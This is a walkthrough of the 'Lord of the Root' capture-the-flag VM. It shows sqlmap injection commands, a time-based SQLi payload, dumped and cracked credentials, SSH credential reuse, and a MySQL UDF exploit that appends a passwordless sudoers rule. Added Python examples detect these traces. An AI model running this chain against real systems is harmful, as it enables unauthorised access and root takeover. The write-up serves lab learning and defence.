Walkthru
A. https://trickster0.wordpress.com/2015/10/08/lord-of-the-root-1-0-1-write-up/ [sqlmap, medusa]
B. https://alexandervoidstar.wordpress.com/2016/12/04/ctf-writeup-lord-of-the-root-1-0-1/ [sqlmap, Tamper data intercept, privilege escalation]
C. http://www.jkcybersecurity.org/2016/11/vulnhub-lord-of-root-writeup.html [Burpsuite]
D. http://www.hackingarticles.in/hack-lord-root-vm-ctf-challenge/ [Metasploit]
E. https://github.com/Hamza-Megahed/CTFs/blob/master/lord-of-the-root/README [MySQL Local Privilege Escalation UDF, getting a user sudo access from MYSQL]
F. https://dook.biz/2015/10/vulnhub-lord-of-the-root-writeup/ [1518.c mysql exploit]
G. http://bullsecurity.blogspot.com/2015/09/lord-of-root-rooted.html [MySQL Local Privilege Escalation UDF but /tmp/setuid file is not present]
All https://www.vulnhub.com/entry/lord-of-the-root-101,129/
Notes:
1. Nmap scan using recon and a standalone nmap TCP and UDP scan shows 22 only.
2. Running tcpdump and listening for anything from the victim didn't reveal anything either.
3. Tried ssh @ targetIP, shows a logo and a message “Easy as 1,2,3”.
4. Tried port knocking with 123 which revealed a new port, tcp 1337.
5. Dirb and nikto on the webserver/port 1337.
6. Found a few pics under /images. Ran strings, file and exiftool on them but no luck.
7. At the index.html page, there is a girl on a horse. Source of the page didn't include anything. Pic says “I will take ring into the Mordor”.
8. I added “/Mordor” to the webserver which revealed another pic. Source of the pic included a code and when I decoded it, it revealed another code which would also need to be decoded, and that reveals a link to a page which is a login page which says “Welcome to the Gates of Mordor”.
9. After testing a few sql queries I didn't have much success, so I thought to fire up sqlmap and watch some magic happen with hopefully some of the parameters…
root@kali:~/Desktop# sqlmap -o -u "http://192.168.124.138:1337/978345210/index.php" --forms --dbs
Actually, I saw only the Webapp db, and at another time the above cmd didn't show any database.
Now let's get the tables for the Webapp db:
root@kali:~/Desktop# sqlmap -o -u "http://192.168.124.138:1337/978345210/index.php" --forms -D Webapp --tables
We can see a nice table called Users, so let's see its columns 😀
root@kali:~/Desktop# sqlmap -o -u "http://192.168.124.138:1337/978345210/index.php" --forms -D Webapp -T Users --columns
So we saw some interesting columns, but let's choose the best of them… let's get the dumps now 😀
root@kali:~/Desktop# sqlmap -o -u "http://192.168.124.138:1337/978345210/index.php" --forms -D Webapp -T Users -C id,username,password --dump
With the above cmd, I actually saw two usernames. Tried it again and it worked just fine.
Option B Sqlmap using Walkthru B.
How did I get the value of --data? I used the Tamper Data intercept Chrome plugin.
sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3
...snip, snip, snip...
[11:58:45] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[*] shutting down at 11:58:45
This result amused me, because most other people who did this CTF did not seem to have problems identifying vulnerabilities at this stage. Nevertheless, the program itself is suggesting a possible solution to the problem. In a real world scenario, I would hesitate far more to do intrusive tests or tests with a higher risk, but this is a virtual machine in my home lab, and the worst that can happen is for me to break it and need to restart the challenge from scratch – which is an unlikely scenario, despite my substantial lack of experience. So let us run a more intrusive test.
root@kali:~# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3
...snip, snip, snip...
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
...snip, snip, snip...
sqlmap identified the following injection point(s) with a total of 2553 HTTP(s) requests:
---
Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))GYdi)-- cmKG&password=pass&submit= Login
---
[12:10:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[12:10:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.101'
[*] shutting down at 12:10:54
root@kali:~#
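The sqlmap run above leaves two traces a defender can look for: the delay-based payload in the username parameter (SLEEP(5) inside a quoted AND clause ending in a -- comment) and the request volume (2553 requests for a single injection point). The following Python script is an added example, not part of this page or of any of the walkthroughs linked above. It scans a constructed, space-separated request log (client, method, path, user-agent, percent-encoded POST body) for those indicators and for clients sending an unusually large number of requests. It assumes that POST bodies are logged by the application or a WAF, which a stock Apache access log does not do.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample request records (not captured from the page's VM). Format per line:
# "<client> <method> <path> <user-agent> <body>", space separated, so the user-agent and
# body must not contain spaces (percent-encoded bodies satisfy that). Line 2 carries the
# time-based payload sqlmap reported above; line 3 uses BENCHMARK(), MySQL's other delay primitive.
SAMPLE_LOG = """\
192.168.56.1 POST /978345210/index.php Mozilla/5.0 username=frodo&password=iwilltakethering&submit=+Login+
192.168.56.1 POST /978345210/index.php sqlmap/1.0-dev username=admin%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GYdi%29--%20cmKG&password=pass&submit=+Login+
192.168.56.1 POST /978345210/index.php sqlmap/1.0-dev username=admin%27%20AND%20BENCHMARK%285000000%2CMD5%281%29%29--%20x&password=pass&submit=+Login+
10.0.0.7 GET /images/hobbit.jpg Mozilla/5.0 -
"""

LINE_RE = re.compile(r"^(?P<client>\S+) (?P<method>\S+) (?P<path>\S+) (?P<ua>\S+) (?P<body>\S+)$")

# Signatures of time-based blind injection and of the tooling that sends it. Each is checked
# against the decoded value of every form field, so percent-encoding does not hide it.
SQLI_PATTERNS = {
    "mysql delay function": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "quote followed by boolean operator": re.compile(r"'\s*(and|or)\b", re.I),
    "sql comment terminator": re.compile(r"--\s"),
}


def inspect_request(line):
    """Return the reasons one request looks like SQL injection probing (empty list if clean)."""
    m = LINE_RE.match(line)
    if not m:
        return []
    reasons = []
    if m["ua"].lower().startswith("sqlmap"):  # sqlmap's default User-Agent
        reasons.append("sqlmap user-agent")
    if m["method"] != "POST":
        return reasons
    for field, values in parse_qs(m["body"], keep_blank_values=True).items():
        for value in values:
            for name, pattern in SQLI_PATTERNS.items():
                if pattern.search(value):
                    reasons.append(f"{name} in parameter '{field}'")
    return reasons


def analyze(log_text, flood_threshold=500):
    """Flag suspicious requests and clients whose volume suggests automated probing.

    The 2553 requests sqlmap needed above are the kind of burst flood_threshold is meant to
    catch; the constructed sample is far smaller, so lower the threshold to see that path."""
    per_client = Counter()
    flagged = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client = line.split(" ", 1)[0]
        per_client[client] += 1
        reasons = inspect_request(line)
        if reasons:
            flagged.append((client, reasons))
    floods = sorted(c for c, n in per_client.items() if n >= flood_threshold)
    return {"flagged": flagged, "flooding_clients": floods, "requests_per_client": dict(per_client)}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG, flood_threshold=3)
    for client, reasons in report["flagged"]:
        print(client, "->", "; ".join(reasons))
    print("high-volume clients:", report["flooding_clients"])
```

The per-field decoding matters: the payload in the log is percent-encoded, and matching on the raw line would miss the quote and the comment terminator. The volume check is the one that still works when the payload itself is obfuscated, because a blind injection has to send hundreds of requests no matter how each one is spelled.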
That is more like it! We now have the database. We know the database type too, so we can run a narrower test now, limiting our injections to MySQL only. First, let us run a standard dump and see what we can find.
root@kali:~# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3 --threads=10 --dbms=MySQL --dump
...snip, snip, snip...
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password |
+----+----------+------------------+
| 1 | frodo | iwilltakethering |
| 2 | smeagol | MyPreciousR00t |
| 3 | aragorn | AndMySword |
| 4 | legolas | AndMyBow |
| 5 | gimli | AndMyAxe |
+----+----------+------------------+
..running it with --dbs instead shows a list of all databases. Same result without --method=POST, but not without --data="username=admin&password=pass&submit=+Login+"
#sqlmap -o -u "http://10.0.1.4:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" -D "Webapp" --dump
..shows list of all tables and content of the database "Webapp"
root@kali:~# sqlmap -o -u "http://192.168.56.101:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3 --threads=10 --dbms=MySQL --users --passwords
...snip, snip, snip...
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'lordoftheroot'
...snip, snip, snip...
[13:07:26] [INFO] writing hashes to a temporary file '/tmp/sqlmapZFTf385534/sqlmaphashes-8cm8Pw.txt'
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[13:07:41] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[13:07:51] [INFO] using default dictionary
...snip, snip, snip...
[13:08:02] [INFO] cracked password 'darkshadow' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *A55A9B9049F69BC2768C9284615361DFBD580B34
[*] root [1]:
password hash: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
clear-text password: darkshadow
[13:08:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.101'
[*] shutting down at 13:08:13
..sqlmap's default dictionary can be used to extract the hash and crack the user/pwd, or you could look up the hash on an online site such as https://crackstation.net/. I got the same pwd both ways from the hash.
We were lucky enough to crack the root password with the default dictionary. If that had not happened, we could have also rerun the test with a bigger wordlist. There are several good wordlists on the HashCat forums and, for hardcore password crackers, CrackStation has a 15GB wordlist up for download.
Too bad, however. Trying to SSH into the machine or logging to the LOTR site as root with the password we found will not work.
So what now? Credential reuse would be my next hypothesis. Many people tend to reuse their credentials, even if they are aware such a practice is insecure. If we cannot log in as root, then maybe we can log in as another of the database users we found: frodo, smeagol, aragorn, legolas and gimli.
root@kali:~# ssh smeagol@192.168.56.101
smeagol@192.168.56.101's password: MyPreciousR00t
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)
smeagol@LordOfTheRoot:~$
Hooray for credentials reuse, for once! I tried to su with the root pwd that we found earlier, but it failed.
There is another interesting piece of information contained in this login. The machine we are on is an Ubuntu 14.04 LTS machine. There are several known privilege escalation exploits for Ubuntu, such as this one.
a. Download the exploit to Kali
b. Transfer to victim host using wget
c. compile using gcc, chmod, run
smeagol@LordOfTheRoot:/tmp$ chmod +x 39166.out
smeagol@LordOfTheRoot:/tmp$ ./39166.out
root@LordOfTheRoot:/tmp# whoami
root
Walkthru from E. Also tried the walkthru from G, but I could not find the /tmp/setuid.c file, so the chmod step doesn't work although there were no errors when I ran the command.
https://0xdeadbeef.info/exploits/raptor_udf2.c
mysql is running as root, so I tried the MySQL 4.x/5.0 - User-Defined Function Local Privilege Escalation exploit.
It is an exploit that gets mysql to run system commands.
cat /usr/share/exploitdb/platforms/linux/local/1518.c
copied it into VM
# gcc -g -c raptor_udf2.c
# gcc -g -shared -Wl,-soname,raptor_udf2.so -oraptor_udf2.so raptor_udf2.o -lc
# mysql -u root -p (password : darkshadow )
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name | ret | dl | type |
+-----------+-----+----------------+----------+
| do_system | 2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)
mysql> select do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers');
mysql> exit
# sudo bash
..where bash is the command to run with sudo; this command runs bash as a super user.
# whoami
root
# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
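The chain above needs several things to be true at once: mysqld running as root, the DB root password, a plugin directory the server can write into with INTO DUMPFILE, a new row in mysql.func, and an appended sudoers rule. Each of those is also something a defender can check for. The following Python audit is an added example, not part of this page or of the raptor_udf2.c exploit it references. It runs over a constructed host snapshot (process owners, mysql.func rows, plugin directory listing, secure_file_priv, sudoers text) rather than querying a live server, and the known_plugins allow-list and admin_users set are assumed baselines.

```python
import re

# Constructed host snapshot standing in for what an agent or script would collect
# (not output from the page's VM). Values mirror the state the UDF chain above leaves behind.
SNAPSHOT = {
    "processes": [("root", "/usr/sbin/mysqld"), ("www-data", "/usr/sbin/apache2")],
    # (name, ret, dl, type) rows as returned by SELECT * FROM mysql.func
    "mysql_func": [("do_system", 2, "raptor_udf2.so", "function")],
    "plugin_dir_files": ["auth_socket.so", "raptor_udf2.so"],
    # assumed allow-list of libraries expected in the plugin directory
    "known_plugins": {"auth_socket.so", "semisync_master.so", "semisync_slave.so"},
    "secure_file_priv": "",
    "sudoers": """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
smeagol ALL =(ALL) NOPASSWD: ALL
""",
    "admin_users": {"root"},  # assumed set of accounts that legitimately hold full sudo
}

# Matches a user line (not a group, alias or Defaults line) granting ALL=(ALL[:ALL]) [NOPASSWD:] ALL,
# tolerating the loose spacing of the injected line above.
FULL_SUDO_RE = re.compile(
    r"^(?P<user>[^\s#%]\S*)\s+ALL\s*=\s*\(ALL(?::ALL)?\)\s*(?P<nopasswd>NOPASSWD:)?\s*ALL$"
)


def audit(snapshot):
    """Return (severity, message) findings for each precondition or trace of the UDF chain."""
    findings = []
    for owner, cmd in snapshot["processes"]:
        if cmd.endswith("mysqld") and owner == "root":
            findings.append(("high", "mysqld runs as root, so any UDF it loads executes as root"))
    for name, _ret, dl, _kind in snapshot["mysql_func"]:
        if dl not in snapshot["known_plugins"]:
            findings.append(("high", f"UDF '{name}' registered from unexpected library '{dl}'"))
    for f in snapshot["plugin_dir_files"]:
        if f not in snapshot["known_plugins"]:
            findings.append(("medium", f"unexpected file in plugin directory: '{f}'"))
    if snapshot["secure_file_priv"] == "":
        findings.append(("medium", "secure_file_priv is empty: LOAD_FILE/INTO DUMPFILE are unrestricted"))
    for line in snapshot["sudoers"].splitlines():
        m = FULL_SUDO_RE.match(line.strip())
        if m and m["user"] not in snapshot["admin_users"]:
            kind = "passwordless full sudo" if m["nopasswd"] else "full sudo"
            findings.append(("high", f"{kind} granted to non-admin user '{m['user']}'"))
    return findings


if __name__ == "__main__":
    for severity, message in audit(SNAPSHOT):
        print(f"[{severity}] {message}")
```

The findings map directly to the fixes: run mysqld as the unprivileged mysql user, point secure_file_priv at a dedicated directory, keep the plugin directory unwritable by the mysql account, and alert on any change to mysql.func or to /etc/sudoers. With those in place the same SQL statements either fail or produce a function that runs as a low-privilege user.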